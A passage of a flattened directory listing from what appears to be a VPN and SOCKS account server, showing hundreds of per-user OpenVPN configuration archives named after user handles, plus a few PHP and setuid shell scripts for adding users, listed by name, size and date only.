DingDong32694_OPENVPN.tgz +-rw-r--r-- 1 root root 3425 May 31 2010 Dominik2990_OPENVPN.tgz +-rw-r--r-- 1 root root 3580 Nov 3 03:49 DrHouse30072_OPENVPN.tgz +-rw-r--r-- 1 root root 3613 Jan 3 07:10 Dukeraider16313_OPENVPN.tgz +-rw-r--r-- 1 root root 3601 Oct 21 18:07 Dukeraider16393_OPENVPN.tgz +-rw-r--r-- 1 root root 3629 Jul 3 2010 Elite13372193_OPENVPN.tgz +-rw-r--r-- 1 root root 3405 Nov 12 20:49 Emrano27523_OPENVPN.tgz +-rw-r--r-- 1 root root 3585 Dec 8 19:36 EsseX10367_OPENVPN.tgz +-rw-r--r-- 1 root root 3415 Aug 2 21:32 FAM0US10495_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Oct 26 19:26 Fahne18697_OPENVPN.tgz +-rw-r--r-- 1 root root 3410 Oct 10 01:51 FatJoe11716_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Nov 27 12:23 FatJoe31469_OPENVPN.tgz +-rw-r--r-- 1 root root 3410 Aug 21 20:16 FavourStyle4249_OPENVPN.tgz +-rw-r--r-- 1 root root 3422 Aug 29 00:05 FaxXer14831_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Oct 21 17:55 FaxXer15844_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Dec 13 17:17 FaxXer26908_OPENVPN.tgz +-rw-r--r-- 1 root root 3435 Jul 6 2010 FinalX213616_OPENVPN.tgz +-rw-r--r-- 1 root root 3401 Nov 27 11:11 FireFreak26704_OPENVPN.tgz +-rw-r--r-- 1 root root 3415 Oct 15 05:21 Flex121428_OPENVPN.tgz +-rw-r--r-- 1 root root 3416 Nov 26 19:01 Flex1219530_OPENVPN.tgz +-rw-r--r-- 1 root root 3590 Oct 18 15:08 Floep19230_OPENVPN.tgz +-rw-r--r-- 1 root root 3587 Aug 22 03:57 Floep22106_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Nov 11 01:28 Freakstyler14325_OPENVPN.tgz +-rw-r--r-- 1 root root 3629 Jun 19 2010 Freakzzor30552_OPENVPN.tgz +-rw-r--r-- 1 root root 3600 Nov 14 20:32 Fruchtii4940_OPENVPN.tgz +-rw-r--r-- 1 root root 3623 Jun 19 2010 G0ETHE22157_OPENVPN.tgz +-rw-r--r-- 1 root root 3571 Dec 19 15:29 G4g4m3l23565_OPENVPN.tgz +-rw-r--r-- 1 root root 3567 Aug 30 11:36 G4g4m3l3086_OPENVPN.tgz +-rw-r--r-- 1 root root 3611 Jul 2 2010 GinTonic30066_OPENVPN.tgz +-rw-r--r-- 1 root root 3598 Dec 17 17:05 Ginal40622069_OPENVPN.tgz +-rw-r--r-- 1 root root 3404 Dec 23 15:13 HGroup29522_OPENVPN.tgz +-rw-r--r-- 1 root root 3414 Aug 22 00:17 HGroup3416_OPENVPN.tgz +-rw-r--r-- 1 root root 3391 Jul 13 10:15 Haloneros10917_OPENVPN.tgz +-rw-r--r-- 1 root root 3396 Aug 19 16:58 Haloneros4547_OPENVPN.tgz +-rw-r--r-- 1 root root 3403 Dec 6 12:38 Haloneros7849_OPENVPN.tgz +-rw-r--r-- 1 root root 3629 Jun 28 2010 Hardstyler23602_OPENVPN.tgz +-rw-r--r-- 1 root root 3403 Jul 23 19:07 Headliner16576_OPENVPN.tgz +-rw-r--r-- 1 root root 3603 Oct 11 07:05 Hellraiser15486_OPENVPN.tgz +-rw-r--r-- 1 root root 3418 Dec 31 00:20 HonigMelone2260_OPENVPN.tgz +-rw-r--r-- 1 root root 3402 Oct 31 03:05 HonigMelone8351_OPENVPN.tgz +-rw-r--r-- 1 root root 3405 Nov 27 01:17 Iceman3299_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Dec 19 20:35 Jaksa22983_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Jul 11 20:01 Jaksa2527_OPENVPN.tgz +-rw-r--r-- 1 root root 3560 Dec 11 20:05 Jayo12320635_OPENVPN.tgz +-rw-r--r-- 1 root root 3603 Jun 30 2010 Joana24614_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Nov 26 12:12 Joana25619_OPENVPN.tgz +-rw-r--r-- 1 root root 3420 Nov 3 20:28 Jondoe28020_OPENVPN.tgz +-rw-r--r-- 1 root root 3410 Aug 30 02:45 Jondoe5523_OPENVPN.tgz +-rw-r--r-- 1 root root 3616 Jul 9 16:47 KaLLi17527_OPENVPN.tgz +-rw-r--r-- 1 root root 3421 Nov 18 01:45 Kamill9407_OPENVPN.tgz +-rw-r--r-- 1 root root 3601 Aug 17 13:08 Kasanova11582_OPENVPN.tgz +-rw-r--r-- 1 root root 3612 Jul 9 14:55 Kasanova18022_OPENVPN.tgz +-rw-r--r-- 1 root root 3608 Nov 4 16:05 Kasanova19712_OPENVPN.tgz +-rw-r--r-- 1 root root 3608 Dec 15 14:30 Kasanova22555_OPENVPN.tgz +-rw-r--r-- 1 root root 3598 Sep 17 17:54 Kasanova25732_OPENVPN.tgz +-rw-r--r-- 1 root root 3572 Oct 10 15:56 Keks1237082_OPENVPN.tgz +-rw-r--r-- 1 root root 3569 Aug 10 21:52 Keks1238205_OPENVPN.tgz +-rw-r--r-- 1 root root 3608 Dec 23 16:08 Kerber0s4146_OPENVPN.tgz +-rw-r--r-- 1 root root 3612 Aug 4 13:21 KeyserSoze18958_OPENVPN.tgz +-rw-r--r-- 1 root root 3435 Oct 14 16:03 KillerZwerg82931120_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Aug 25 20:36 Kluless30753_OPENVPN.tgz +-rw-r--r-- 1 root root 3600 Dec 29 15:05 Kolumbus15438_OPENVPN.tgz +-rw-r--r-- 1 root root 3404 Nov 15 19:14 Kucka19807504_OPENVPN.tgz +-rw-r--r-- 1 root root 3625 Jun 4 2010 LAWest26683_OPENVPN.tgz +-rw-r--r-- 1 root root 3615 Jul 6 2010 LAWest32033_OPENVPN.tgz +-rw-r--r-- 1 root root 3567 Dec 7 12:10 LiipTon17714_OPENVPN.tgz +-rw-r--r-- 1 root root 3409 Jul 29 11:58 Loader15498_OPENVPN.tgz +-rw-r--r-- 1 root root 3415 Dec 28 12:43 Loader30988_OPENVPN.tgz +-rw-r--r-- 1 root root 3614 Jun 5 2010 Loptr20388_OPENVPN.tgz +-rw-r--r-- 1 root root 3580 Jul 20 17:23 Loptr27683_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Aug 28 00:29 Lowne11627_OPENVPN.tgz +-rw-r--r-- 1 root root 3405 Nov 11 18:34 LuckyLuke28779_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Aug 10 22:07 M000N5312_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Nov 12 20:43 Mandy13987_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Aug 4 22:43 Mandy31362_OPENVPN.tgz +-rw-r--r-- 1 root root 3607 May 12 2010 Mandy31820_OPENVPN.tgz +-rw-r--r-- 1 root root 3607 Sep 2 01:46 Mantis7011486_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Aug 19 00:23 MarkusSx16847_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Sep 10 16:05 Masterlord10052_OPENVPN.tgz +-rw-r--r-- 1 root root 3594 Dec 3 17:10 Maxim6745_OPENVPN.tgz +-rw-r--r-- 1 root root 3421 Dec 29 15:38 McKnad15403_OPENVPN.tgz +-rw-r--r-- 1 root root 3622 May 28 2010 McKnad23906_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Aug 29 18:10 McKnad2804_OPENVPN.tgz +-rw-r--r-- 1 root root 3420 Oct 3 00:19 McKnad9531_OPENVPN.tgz +-rw-r--r-- 1 root root 3627 Jul 11 00:59 Morgen22283_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Aug 14 23:15 Mutti17770_OPENVPN.tgz +-rw-r--r-- 1 root root 3581 Oct 5 01:40 Mutti21505_OPENVPN.tgz +-rw-r--r-- 1 root root 3610 May 12 2010 Mutti8762_OPENVPN.tgz +-rw-r--r-- 1 root root 3575 Nov 9 23:21 N3v107908_OPENVPN.tgz +-rw-r--r-- 1 root root 3599 Jan 2 11:57 N3v108540_OPENVPN.tgz +-rw-r--r-- 1 root root 3415 Jul 30 16:17 NDTBIT12101_OPENVPN.tgz +-rw-r--r-- 1 root root 3428 Oct 16 05:23 NDTBIT25949_OPENVPN.tgz +-rw-r--r-- 1 root root 3413 Sep 7 20:33 NDTBIT26205_OPENVPN.tgz +-rw-r--r-- 1 root root 3576 Jul 29 04:41 Nappo10976_OPENVPN.tgz +-rw-r--r-- 1 root root 3401 Aug 10 13:09 Nighty5510_OPENVPN.tgz +-rw-r--r-- 1 root root 3611 Jun 3 2010 Nop0x29828_OPENVPN.tgz +-rw-r--r-- 1 root root 3616 May 27 2010 Oldsql26067_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Sep 23 01:42 Pasi6512495_OPENVPN.tgz +-rw-r--r-- 1 root root 3632 Jul 10 00:12 PeteSniff26963_OPENVPN.tgz +-rw-r--r-- 1 root root 3622 May 22 2010 Ph0nix4947_OPENVPN.tgz +-rw-r--r-- 1 root root 3635 Jun 29 2010 Phantonym17925_OPENVPN.tgz +-rw-r--r-- 1 root root 3573 Oct 26 05:43 Phiriun2823_OPENVPN.tgz +-rw-r--r-- 1 root root 3409 Dec 10 17:07 Pitbull6910648_OPENVPN.tgz +-rw-r--r-- 1 root root 3615 Jun 25 2010 Pl0051690_OPENVPN.tgz +-rw-r--r-- 1 root root 3602 Nov 28 08:39 Poseidon10572_OPENVPN.tgz +-rw-r--r-- 1 root root 3600 Aug 16 21:45 PostMort3m12175_OPENVPN.tgz +-rw-r--r-- 1 root root 3422 Sep 2 19:56 Prager28005_OPENVPN.tgz +-rw-r--r-- 1 root root 3614 Jun 21 2010 Prager2997_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Aug 24 16:50 Predat0r20106_OPENVPN.tgz +-rw-r--r-- 1 root root 3596 Jul 13 18:11 Predat0r9093_OPENVPN.tgz +-rw-r--r-- 1 root root 3620 Jun 13 2010 Profi13618_OPENVPN.tgz +-rw-r--r-- 1 root root 3623 Aug 2 01:50 Pussyrider12591_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 Sep 7 02:28 Pussyrider2553_OPENVPN.tgz +-rw-r--r-- 1 root root 3621 Jul 5 2010 Pwhoam7437_OPENVPN.tgz +-rw-r--r-- 1 root root 3414 Nov 23 23:34 QuickSilver30900_OPENVPN.tgz +-rw-r--r-- 1 root root 3436 Jun 8 2010 R0MANCE30753_OPENVPN.tgz +-rw-r--r-- 1 root root 3628 Jun 29 2010 Raiden19032_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Nov 21 20:34 Rambo020232438_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Oct 4 16:22 Rambo02026184_OPENVPN.tgz +-rw-r--r-- 1 root root 3573 Jul 18 16:28 Raser8912111_OPENVPN.tgz +-rw-r--r-- 1 root root 3584 Oct 19 23:52 Ratte15435_OPENVPN.tgz +-rw-r--r-- 1 root root 3575 Oct 20 00:50 Ratte29885_OPENVPN.tgz +-rw-r--r-- 1 root root 3573 Aug 8 14:34 Revar13568_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Sep 13 20:35 Revar186_OPENVPN.tgz +-rw-r--r-- 1 root root 3415 Aug 3 00:36 Rodney29032_OPENVPN.tgz +-rw-r--r-- 1 root root 3602 Sep 13 18:11 S3t4p3x311542_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Dec 14 12:26 Sa1nt856432005_OPENVPN.tgz +-rw-r--r-- 1 root root 3403 Sep 22 02:07 SaCuSkill19539_OPENVPN.tgz +-rw-r--r-- 1 root root 3430 Jun 3 2010 Scanner22720_OPENVPN.tgz +-rw-r--r-- 1 root root 3405 Dec 27 17:07 Senninmod9366_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Dec 11 17:13 SilverFox12282_OPENVPN.tgz +-rw-r--r-- 1 root root 3574 Aug 29 20:49 SilverS14224_OPENVPN.tgz +-rw-r--r-- 1 root root 3431 May 15 2010 SilverS18699_OPENVPN.tgz +-rw-r--r-- 1 root root 3578 Oct 2 10:17 SilverS29996_OPENVPN.tgz +-rw-r--r-- 1 root root 3590 Nov 1 15:44 SlamD7819_OPENVPN.tgz +-rw-r--r-- 1 root root 3596 Nov 21 22:25 SleepyHollow30848_OPENVPN.tgz +-rw-r--r-- 1 root root 3574 Aug 20 05:00 Slumski15259_OPENVPN.tgz +-rw-r--r-- 1 root root 3404 Dec 11 17:30 SmileNike4939_OPENVPN.tgz +-rw-r--r-- 1 root root 3628 Jun 25 2010 SonnyBlack761_OPENVPN.tgz +-rw-r--r-- 1 root root 3414 Nov 18 20:30 Sparkasse19880_OPENVPN.tgz +-rw-r--r-- 1 root root 3427 Jun 16 2010 Standex637_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Nov 7 23:40 Star1711657_OPENVPN.tgz +-rw-r--r-- 1 root root 3407 Oct 14 20:11 Stejin14830_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Nov 29 13:23 Stejin27979_OPENVPN.tgz +-rw-r--r-- 1 root root 3621 Jun 9 2010 SunDay5117_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Sep 27 09:43 Swiss8114_OPENVPN.tgz +-rw-r--r-- 1 root root 3572 Jul 17 22:38 Sylcore21775_OPENVPN.tgz +-rw-r--r-- 1 root root 3561 Jul 16 03:23 Sylcore27550_OPENVPN.tgz +-rw-r--r-- 1 root root 3627 Jul 2 2010 Syntex31511_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Nov 4 06:13 TARTAROS15648_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Jul 18 13:57 Thnallgzt1355_OPENVPN.tgz +-rw-r--r-- 1 root root 3613 Dec 13 06:07 Thunder052_OPENVPN.tgz +-rw-r--r-- 1 root root 3403 Oct 17 17:16 Tiberius121180_OPENVPN.tgz +-rw-r--r-- 1 root root 3605 Aug 20 21:22 Tiberius25495_OPENVPN.tgz +-rw-r--r-- 1 root root 3420 Aug 29 17:10 Torbon5467_OPENVPN.tgz +-rw-r--r-- 1 root root 3597 Oct 4 01:41 Trinx15364_OPENVPN.tgz +-rw-r--r-- 1 root root 3581 Nov 22 00:54 Trinx24908_OPENVPN.tgz +-rw-r--r-- 1 root root 3593 Aug 29 21:56 Trinx31242_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Jul 11 18:39 Trinx9318_OPENVPN.tgz +-rw-r--r-- 1 root root 3408 Jul 15 21:27 Tronic24834_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Jul 18 21:32 Tronic32029_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 May 17 2010 Tweaknap31697_OPENVPN.tgz +-rw-r--r-- 1 root root 3417 Sep 16 14:41 Tzolli11813_OPENVPN.tgz +-rw-r--r-- 1 root root 3414 Sep 17 00:26 Tzolli12805_OPENVPN.tgz +-rw-r--r-- 1 root root 3634 Jul 2 2010 Tzolli31127_OPENVPN.tgz +-rw-r--r-- 1 root root 3626 Jun 1 2010 Tzolli530_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Oct 22 01:07 Ukash31388_OPENVPN.tgz +-rw-r--r-- 1 root root 3581 Oct 5 15:59 WEEDtwo23015_OPENVPN.tgz +-rw-r--r-- 1 root root 3557 Dec 14 17:42 WEEDtwo358_OPENVPN.tgz +-rw-r--r-- 1 root root 3570 Oct 18 17:52 WalterW26039_OPENVPN.tgz +-rw-r--r-- 1 root root 3567 Dec 1 14:47 WalterW5032_OPENVPN.tgz +-rw-r--r-- 1 root root 3616 Jul 10 16:28 WeArEoNe5813_OPENVPN.tgz +-rw-r--r-- 1 root root 3632 Jul 1 2010 Weichei4520239_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 Nov 21 22:43 Wursteintopf1171_OPENVPN.tgz +-rw-r--r-- 1 root root 3614 Jul 9 2010 X3N0N8545_OPENVPN.tgz +-rw-r--r-- 1 root root 3576 Nov 1 20:31 Xeral1887_OPENVPN.tgz +-rw-r--r-- 1 root root 3578 Sep 13 21:52 Zerox8831175_OPENVPN.tgz +-rw-r--r-- 1 root root 3571 Nov 7 19:55 Zorator17384_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Jul 17 18:58 Zuraaa30069_OPENVPN.tgz +-rw-r--r-- 1 root root 387 Sep 17 00:14 addSSHuser.php +-rw-r--r-- 1 root root 280 Sep 17 00:14 addVPNuser.php +-rw-r--r-- 1 root root 3574 Sep 1 00:39 adios21334_OPENVPN.tgz +-rw-r--r-- 1 root root 3610 Nov 27 13:43 adminadmin663_OPENVPN.tgz +-rw-r--r-- 1 root root 3395 Dec 24 05:38 analytics23444_OPENVPN.tgz +-rw-r--r-- 1 root root 3408 Dec 18 08:46 andreas741128201_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Sep 25 10:41 anonymius696_OPENVPN.tgz +-rw-r--r-- 1 root root 3430 Jul 6 2010 anoobis20036_OPENVPN.tgz +-rw-r--r-- 1 root root 3628 Jun 18 2010 asd12322807_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Aug 2 22:29 asd12326649_OPENVPN.tgz +-rw-r--r-- 1 root root 3414 Aug 3 18:40 asd12328521_OPENVPN.tgz +-rw-r--r-- 1 root root 3621 Jun 25 2010 asd1233886_OPENVPN.tgz +-rw-r--r-- 1 root root 3415 Jul 20 19:54 asdfg12345627545_OPENVPN.tgz +-rw-r--r-- 1 root root 3405 Nov 2 15:47 asdfghjkl27874_OPENVPN.tgz +-rw-r--r-- 1 root root 3564 Dec 10 07:39 awesome50_OPENVPN.tgz +-rw-r--r-- 1 root root 3589 Nov 9 15:31 b0uNz18610_OPENVPN.tgz +-rw-r--r-- 1 root root 3594 Dec 2 22:03 b111124378_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Oct 24 03:30 b14ckf1ag13016_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Dec 15 15:30 b14ckf1ag14907_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Oct 4 17:00 b7231244_OPENVPN.tgz +-rw-r--r-- 1 root root 3578 Nov 21 03:08 b72317220_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Oct 20 04:19 b72337515_OPENVPN.tgz +-rw-r--r-- 1 root root 3596 Nov 9 01:37 bLackftw19898791_OPENVPN.tgz +-rw-r--r-- 1 root root 3602 Oct 11 20:18 badboy10125461_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Jul 17 23:40 bambuss3686_OPENVPN.tgz +-rw-r--r-- 1 root root 3419 Sep 9 20:38 basics14055_OPENVPN.tgz +-rw-r--r-- 1 root root 3581 Dec 27 16:44 becks1088_OPENVPN.tgz +-rw-r--r-- 1 root root 3587 Nov 5 18:26 becks1540_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Nov 7 19:27 bergi181219604_OPENVPN.tgz +-rw-r--r-- 1 root root 3576 Aug 15 01:15 bigtwin25561_OPENVPN.tgz +-rw-r--r-- 1 root root 3397 Jul 13 12:56 blackcell12902_OPENVPN.tgz +-rw-r--r-- 1 root root 3641 Jun 11 2010 blackcell1900_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Aug 14 18:25 bloodyrain6388_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Jun 3 2010 bluballa28446_OPENVPN.tgz +-rw-r--r-- 1 root root 3584 Nov 10 20:41 bobby11515_OPENVPN.tgz +-rw-r--r-- 1 root root 3576 Aug 12 14:55 bobby15402_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Sep 17 03:28 bobby1638_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Dec 11 14:06 bobby7804_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Oct 18 18:37 cafe116337_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Aug 14 21:49 cardercarder18567_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Jul 7 2010 cardercarder21402_OPENVPN.tgz +-rw-r--r-- 1 root root 3593 Dec 12 19:16 cardercarder31297_OPENVPN.tgz +-rw-r--r-- 1 root root 3588 Sep 14 07:54 cardercarder6893_OPENVPN.tgz +-rw-r--r-- 1 root root 3585 Oct 28 02:05 cardercarder8070_OPENVPN.tgz +-rw-r--r-- 1 root root 3416 Oct 15 01:29 carlos3914_OPENVPN.tgz +-rw-r--r-- 1 root root 3564 Nov 23 05:29 cayenne10018_OPENVPN.tgz +-rw-r--r-- 1 root root 3605 Jul 21 17:29 checka1220438_OPENVPN.tgz +-rw-r--r-- 1 root root 3404 Dec 28 14:48 chessy33331564_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Sep 29 16:28 chessy3333215_OPENVPN.tgz +-rw-r--r-- 1 root root 3403 Nov 26 12:28 chiller133713287_OPENVPN.tgz +-rw-r--r-- 1 root root 3421 Dec 29 11:22 chiller13378063_OPENVPN.tgz +-rw-r--r-- 1 root root 3409 Sep 10 00:34 chip998558_OPENVPN.tgz +-rw-r--r-- 1 root root 3611 Dec 7 09:16 conviction28712_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Oct 28 01:20 conviction6444_OPENVPN.tgz +-rw-r--r-- 1 root root 3623 Jul 8 2010 coolio13949_OPENVPN.tgz +-rw-r--r-- 1 root root 3575 Sep 5 22:43 crack9164_OPENVPN.tgz +-rwsr-sr-x 1 root root 700 May 9 2010 createSSHsocks.sh +-rwsr-sr-x 1 root root 518 May 11 2010 createVPN.sh +-rw-r--r-- 1 root root 3412 Jul 17 20:49 crypt012465_OPENVPN.tgz +-rw-r--r-- 1 root root 3569 Oct 27 16:38 cryptus4764_OPENVPN.tgz +-rw-r--r-- 1 root root 3598 Sep 11 19:15 cunit15618415_OPENVPN.tgz +-rw-r--r-- 1 root root 3590 Aug 11 14:44 cunit15619893_OPENVPN.tgz +-rw-r--r-- 1 root root 3593 Nov 9 23:03 cunit15624106_OPENVPN.tgz +-rw-r--r-- 1 root root 3565 Jul 23 15:14 d0ne0ne32695_OPENVPN.tgz +-rw-r--r-- 1 root root 3607 Dec 30 22:11 darkt0wn15874_OPENVPN.tgz +-rw-r--r-- 1 root root 3611 Nov 26 19:37 darkt0wn3662_OPENVPN.tgz +-rw-r--r-- 1 root root 3423 Jun 11 2010 dasemih10582_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Aug 9 03:01 denniswolf15380_OPENVPN.tgz +-rw-r--r-- 1 root root 3611 Sep 8 17:06 denniswolf975_OPENVPN.tgz +-rw-r--r-- 1 root root 3611 May 31 2010 desaster30502_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 Jul 10 15:33 det0x10826_OPENVPN.tgz +-rw-r--r-- 1 root root 3614 Jun 6 2010 det0x25144_OPENVPN.tgz +-rw-r--r-- 1 root root 3607 May 16 2010 det0x6693_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Dec 5 20:40 dex9030410_OPENVPN.tgz +-rw-r--r-- 1 root root 3405 Aug 29 19:38 dinara3242_OPENVPN.tgz +-rw-r--r-- 1 root root 3603 Aug 18 17:42 docscanner11883_OPENVPN.tgz +-rw-r--r-- 1 root root 3600 Dec 10 20:19 docscanner15891_OPENVPN.tgz +-rw-r--r-- 1 root root 3612 Oct 24 17:48 docscanner6161_OPENVPN.tgz +-rw-r--r-- 1 root root 3602 Oct 22 14:14 dome250310063_OPENVPN.tgz +-rw-r--r-- 1 root root 3407 Aug 24 16:08 donkey17577_OPENVPN.tgz +-rw-r--r-- 1 root root 3594 Nov 24 19:26 dpgc201011939_OPENVPN.tgz +-rw-r--r-- 1 root root 3422 Nov 7 23:02 dreckz7739_OPENVPN.tgz +-rw-r--r-- 1 root root 3605 Nov 22 18:25 drhandel18818_OPENVPN.tgz +-rw-r--r-- 1 root root 3410 Nov 27 11:04 drweed7100_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Nov 19 01:43 duden16363_OPENVPN.tgz +-rw-r--r-- 1 root root 3578 Oct 27 22:52 dudex20927_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Sep 12 18:50 dudex29255_OPENVPN.tgz +-rw-r--r-- 1 root root 3439 Jun 1 2010 e5e1llo30858_OPENVPN.tgz +-rw-r--r-- 1 root root 3573 Nov 4 23:11 eater15817_OPENVPN.tgz +-rw-r--r-- 1 root root 3418 Oct 27 19:21 eddinc12916_OPENVPN.tgz +-rw-r--r-- 1 root root 3581 Jan 3 15:05 elektro27327_OPENVPN.tgz +-rw-r--r-- 1 root root 3560 Nov 30 15:30 elektro6996_OPENVPN.tgz +-rw-r--r-- 1 root root 3585 Jul 15 00:05 elit327890_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Nov 18 12:14 epoepo25324_OPENVPN.tgz +-rw-r--r-- 1 root root 3600 Jul 14 20:26 f1resp1n9199_OPENVPN.tgz +-rw-r--r-- 1 root root 3589 Nov 8 01:59 finnq10545_OPENVPN.tgz +-rw-r--r-- 1 root root 3426 Oct 23 21:19 fluxay4913_OPENVPN.tgz +-rw-r--r-- 1 root root 3576 Sep 4 01:34 forza12423_OPENVPN.tgz +-rw-r--r-- 1 root root 3599 Aug 24 21:30 fragezeichen14241_OPENVPN.tgz +-rw-r--r-- 1 root root 3602 Oct 5 16:36 fragezeichen3542_OPENVPN.tgz +-rw-r--r-- 1 root root 3603 Nov 26 23:39 frankylo18404_OPENVPN.tgz +-rw-r--r-- 1 root root 3423 Nov 6 03:30 freaky11488_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Nov 29 12:11 freshestman14998_OPENVPN.tgz +-rw-r--r-- 1 root root 3416 Sep 7 02:44 freshestman20055_OPENVPN.tgz +-rw-r--r-- 1 root root 3410 Oct 15 15:11 freshestman28233_OPENVPN.tgz +-rw-r--r-- 1 root root 3611 Nov 16 01:27 fuckdawn12660_OPENVPN.tgz +-rw-r--r-- 1 root root 3417 Jul 20 01:30 galaxi12741_OPENVPN.tgz +-rw-r--r-- 1 root root 3410 Jul 19 22:52 galaxi15585_OPENVPN.tgz +-rw-r--r-- 1 root root 3418 Oct 2 23:53 galaxi18086_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Oct 30 02:40 gehtes5036_OPENVPN.tgz +-rw-r--r-- 1 root root 3408 Oct 28 05:45 genetik1015054_OPENVPN.tgz +-rw-r--r-- 1 root root 3606 Jun 8 2010 godfella23150_OPENVPN.tgz +-rw-r--r-- 1 root root 3418 Nov 3 00:53 ground22054_OPENVPN.tgz +-rw-r--r-- 1 root root 3577 Sep 22 02:09 groundy30694_OPENVPN.tgz +-rw-r--r-- 1 root root 3423 Aug 4 00:04 h2d2e218599_OPENVPN.tgz +-rw-r--r-- 1 root root 3590 Aug 6 19:39 h3l0x29397_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 Jun 28 2010 h3l0x3097_OPENVPN.tgz +-rw-r--r-- 1 root root 3612 May 27 2010 h3l0x31602_OPENVPN.tgz +-rw-r--r-- 1 root root 3590 Oct 16 21:20 h3l0x32259_OPENVPN.tgz +-rw-r--r-- 1 root root 3576 Sep 6 23:03 h3l0x4320_OPENVPN.tgz +-rw-r--r-- 1 root root 3416 Dec 6 13:04 habadu5745_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Sep 22 11:39 hackbart231851_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Nov 13 22:57 hackbart24778_OPENVPN.tgz +-rw-r--r-- 1 root root 3607 Oct 31 23:11 hackoman8853_OPENVPN.tgz +-rw-r--r-- 1 root root 3592 Aug 18 15:47 haddemann1235295_OPENVPN.tgz +-rw-r--r-- 1 root root 3593 Jul 12 15:15 hallo12322143_OPENVPN.tgz +-rw-r--r-- 1 root root 3416 Sep 4 01:51 hallo50505023476_OPENVPN.tgz +-rw-r--r-- 1 root root 3596 Nov 28 20:53 hans200020336_OPENVPN.tgz +-rw-r--r-- 1 root root 3407 Dec 4 19:35 hanshans12322721_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Sep 18 18:05 hanswurst4277_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Nov 20 14:42 hanswurst961_OPENVPN.tgz +-rw-r--r-- 1 root root 3615 Nov 4 02:00 haooosii22019_OPENVPN.tgz +-rw-r--r-- 1 root root 3628 Jul 8 2010 hasenp0wer1224_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Jul 12 16:53 hexst4tic15575_OPENVPN.tgz +-rw-r--r-- 1 root root 3421 Nov 6 17:30 hexst4tic20328_OPENVPN.tgz +-rw-r--r-- 1 root root 3413 Sep 25 12:59 hexst4tic22131_OPENVPN.tgz +-rw-r--r-- 1 root root 3391 Aug 23 16:21 hexst4tic24446_OPENVPN.tgz +-rw-r--r-- 1 root root 3635 Jun 9 2010 hexst4tic31381_OPENVPN.tgz +-rw-r--r-- 1 root root 3396 Jul 12 02:43 hexst4tic7086_OPENVPN.tgz +-rw-r--r-- 1 root root 3396 Oct 26 02:49 heyhey12325893_OPENVPN.tgz +-rw-r--r-- 1 root root 3583 Jan 2 23:36 hi31757_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 Dec 8 16:47 hung23046577_OPENVPN.tgz +-rw-r--r-- 1 root root 3404 Oct 20 00:23 hushbaits3027_OPENVPN.tgz +-rw-r--r-- 1 root root 3407 Dec 1 09:21 hushbaits8016_OPENVPN.tgz +-rw-r--r-- 1 root root 3437 Jul 2 2010 ibrains20948_OPENVPN.tgz +-rw-r--r-- 1 root root 3564 Nov 27 22:57 illegal9593_OPENVPN.tgz +-rw-r--r-- 1 root root 3 May 11 2010 index.htm +-rw-r--r-- 1 root root 2 Sep 17 03:05 index.html 